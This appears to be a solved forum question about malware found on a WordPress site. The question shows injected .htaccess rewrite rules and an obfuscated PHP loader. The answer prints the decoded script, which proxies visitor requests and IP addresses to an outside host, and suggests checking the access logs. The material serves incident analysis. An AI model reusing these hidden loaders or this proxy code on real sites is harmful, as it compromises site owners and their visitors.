[SOLVED] What does this code mean? (Virus Looking)

Issue

I'm wondering if anyone can figure out what the code in this php does

I've removed it now but i'm curious as to how it got there and what it does

I found this in one of my wordpress sites

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(emyiac-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/emyiacimwqkfv-.php?p=$2 [L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f 
RewriteCond %{REQUEST_FILENAME} !-d 
RewriteRule ^(auyaix-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/auyaixfblclcc-.php?p=$2 [L]
</IfModule>

And one of the files contains this:

<?php $TWRgwh3="6jsmOpAjZ5Bi5Ll2wfssHqB3cBfkZgGlMnzBalluE/Hi5mPZ9XQ6wo21mQNXZanQAAvE8X/GnjBNvD0dEbPCDPD1hoOiSjwuWReEae1cV3DnIhxxXbDWak5n7uteSIOeKlQ7HHX+fRlp/ESRTLFEgPHdF2y698RzSYrsp0rU8Aas3bH+gb6j+1D03qNaS/PUqReuTrZtETiQCi4LUHo4gRxzKp/6TXUk+aN3FzWOBI6Ini3YXbgcKPoop3wVviiKz9C3JuSg/eFgGqslnyo+eCmEk1Vl+NiIBBO8z9N+DA/VrM4z0DeobnbIbPlTrxqUPmOX1/SsphPhOgTvqi2mdbJQqEinevjitWI+BNPngJpO21mfOzu982FXRD/7vdcp1pnBoipzKLf7XEXOx0i3tcFVVB8/+5k5o4f8eYDPQawmvLN7fNr3SS126GLAkPVi9e6ovA6DRe78E5xzixe9iguUgvAyg1kk9vGHcICXoJ9tI8QaiP67W4j/L1scsNGGwZxRc41fLW0I1xFNZSlgOIpaMeIq2vrRvG6fXE8uUpSooTesUAmkzKfcJY8ixOAEI5JSS4QPfjgDqsvY5wVXx80CQvUBj1TFzCFhHeOTCKOVOh7QYwkyosnH7OW4ql0yXEiAr2KizXx8A909Pd/kJb3RnMk9qsOf5NU0Si4DDIjB1D5IvU/0LmKioSMQo8ZDMrgHUJKxXqSjRgG4DN+sk1zucAxNJ2yQkXCb+4wWLJelYkLyDun19PmA7gtUxTZWvF/DUje1a4FNqnI31zYLIc4d34AvTwQfRuaBZyDKbCrWmAbJ5N6qTYpwofIyWM3odv+IFbmmb58UaDU44CJQJzrE9Sg4ScIllAUlD8rODiGSbLdf/zf4nM91LH6x0AKJZ1xp+Ekm5p1ZHMjeNfzPwMm+oorgi1Pwpm2XIdYV2WgN+2K+FFYCvUA5IRgqspaerwIC/qrrJkP6RAGo3wzuxWZY3CB9qin/iw2CqrVDSDuPHW69sI16EVY5zzyDL7Mf4WNKcPlUyaj2f6i9WaQShXxvjyQL9LJ9b99k58jXIVDqDhID16dlZq6loIKq10/3nXSN7OIQLtWY0liMcLR0HZ6vGdKELM9VJGxLoedP9o0Y4Z+Q2kjqos8Qm8Di3X4LhO2SmOAuFZ6ENqGSQ4JJRe8SGn/8JTNDQ7MfaD+DlwiuCOSQYg==";$kYIKQj="\141";$syMk1BFi="\x62\x61\x73";$ZTMvjgX="\163\164";$yW51kL="Fl1YmASDIjxWQ0bimmP2IFzh9Z02qUYY1VNWnIdeBTMHhb";$cBqLFy="\x67\x7a\151";$cBqLFy.="\156\x66";$kYIKQj.="\163";$yW51kL.="GnXvyMd1FTzkcz+9tdyrqTyacaX1za5EqcdXEJOefUMKao";$syMk1BFi.="\x65\66\x34";$ZTMvjgX.="\162\137\x72";$ZTMvjgX.="\157\x74";$cBqLFy.="\x6c\x61";$syMk1BFi.="\x5f\x64\x65\143";$yW51kL.="TywQzQnJObMjwen2WfDRCqixwPXA/XVHhAaEZQJkzaStpL";$kYIKQj.="\163\145";$cBqLFy.="\x74\x65";$syMk1BFi.="\x6f\x64\145";$yW51kL.="w5pTSIf1uAGJhUIWNoIMXqPa3pXwHtMtTS1GJgND==";$kYIKQj.="\162\x74";$ZTMvjgX.="\x31\x33";@$kYIKQj($cBqLFy($syMk1BFi($ZTMvjgX($yW51kL))));?>

Solution

Since the question was "what does this code mean?" Here is what that code boils down to.

If I were you, I'd start looking through my access log files for entries where ?p= was included in the url.

<?php
header('Content-Type: text/html; charset=UTF-8');
$p = 'p'; 
$host='websys-nt.com';
$path='/wb0454545/';
$srvr=$_SERVER['HTTP_HOST'].'/';

function GetRealIp()
{
 if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
 {   $ip=$_SERVER['HTTP_CLIENT_IP'];}
 elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 {  $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}
 else
 {   $ip=$_SERVER['REMOTE_ADDR'];}
 return $ip;
} 

if(isset($_GET[$p])) 
{
$r = GetRealIp();
if (strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")!==FALSE) $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")+4);

$param=$_GET[$p];
if (strpos($param, '.js') !== false)
{
$ext='.js';
$param = str_replace('.js','',$param);
$srvr='';
}
else if(strpos($param, 'prokl-') !== false)
{
$ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6));
$param='prokl';
$srvr='';
}
else if(strpos($param, '.css') !== false)
{
$ext='.css';
$param = str_replace('.css','',$param);
$srvr='';
}
else if(strpos($param, '.gif') !== false)
{
$ext='.gif';
$param = str_replace('.gif','',$param);
$srvr='';
}
else if(strpos($param, '.htm') !== false)
{
$ext='.htm';
$param 
= str_replace('.htm','',$param);
$srvr='';
}
else if(strpos($param, '.jpg') !== false)
{
$ext='.jpg';
$param = str_replace('.jpg','',$param);
$srvr='';
}
else if(strpos($param, '.ico') !== false)
{
$ext='.ico';
$param = str_replace('.ico','',$param);
$srvr='';
}
else if(strpos($param, '.png') !== false)
{
$ext='.png';
$param = str_replace('.png','',$param);
$srvr='';
}
else{
$rf=$_SERVER['HTTP_REFERER'];
$ext='.php?ip='.$r.'&ref='.$ref;
}
$out ='';
$buff = '';
if ($curl = curl_init())
        {
        curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
        $out = curl_exec($curl);
        curl_close($curl);
        }else{
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1\r\n";
    $out .= "Host: ".$host."\r\n";
    $out .= "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        $buff.=fgets($fp, 128);
    }
    $result = explode("\r\n\r\n", $buff, 2);
    $out= $result[1];
    fclose($fp);
} 
    }
    echo $out;
    exit
    ;   
}       
?>

Answered By - castis

Answer Checked By - Willingham (WPSolving Volunteer)